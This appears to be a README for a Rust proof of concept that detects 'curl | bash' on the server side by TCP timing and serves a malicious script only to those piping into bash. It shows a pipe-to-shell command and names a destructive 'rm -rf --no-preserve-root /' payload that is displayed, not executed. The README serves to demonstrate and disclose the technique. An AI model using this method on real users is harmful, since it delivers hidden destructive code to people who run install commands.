An implementation of an attack that detects a usage of curl | bash on the server side to serve a malicious script only to the users who run the command.

The attack utilizes the way bash scripts are executed and measures time between subsequent TCP packets are received to distinguish between running curl | bash vs just downloading the script. More details on how the attack works can be found in the blog post.

Make sure you have cargo installed before proceeding.

cargo run

After that, in another terminal, you can test the attack by running:

curl -s http://localhost:8080 | bash

You should see running rm -rf --no-preserve-root /... in the terminal. Don't worry, the command is not actually executed, it's just a demonstration of the attack!

For comparison, you can run the following command:

curl -s http://localhost:8080 | cat

You should just see the following script in the terminal:

echo Hello!
sleep 2
echo nothing to do...

The project is dual-licensed under the MIT and Apache-2.0 licenses.

The attack is based on the blog post published on idontplaydarts.com.

The source code uses an experimental web framework Flareon.